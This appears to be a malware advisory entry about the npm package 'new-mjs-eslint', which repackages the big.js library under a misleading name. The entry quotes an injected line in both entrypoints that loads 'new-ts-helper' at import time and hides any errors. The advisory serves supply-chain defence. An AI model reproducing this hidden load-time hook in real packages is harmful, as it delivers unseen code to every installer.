MAL-2026-6226

--- _-= Per source details. Do not edit below this line.=-_

## Source: amazon-inspector (b4ae24b182a00059424b8ea4800927bbbf662f0e6bf20264af611d37203a3f2e) Package is published under the unrelated name 'new-mjs-eslint' but ships a verbatim copy of the big.js decimal-arithmetic library (original MikeMcl/big.js header, README, and source). Both main entrypoints, big.js and big.mjs, contain an injected line at lines 605-606: `const helper = require("new-ts-helper"); helper.from_str().then(e => e).catch(e => { });`. This fires on every require()/import of the package, loads the sibling dependency new-ts-helper, invokes its from_str() function, and silently swallows any error. The package name does not match its advertised content (eslint-shaped name, big.js content), the injected call sits mid-file rather than at a natural import location, and errors are deliberately suppressed — the entrypoint is a delivery vector for whatever code new-ts-helper ships, executed at load time on any installer that imports the package.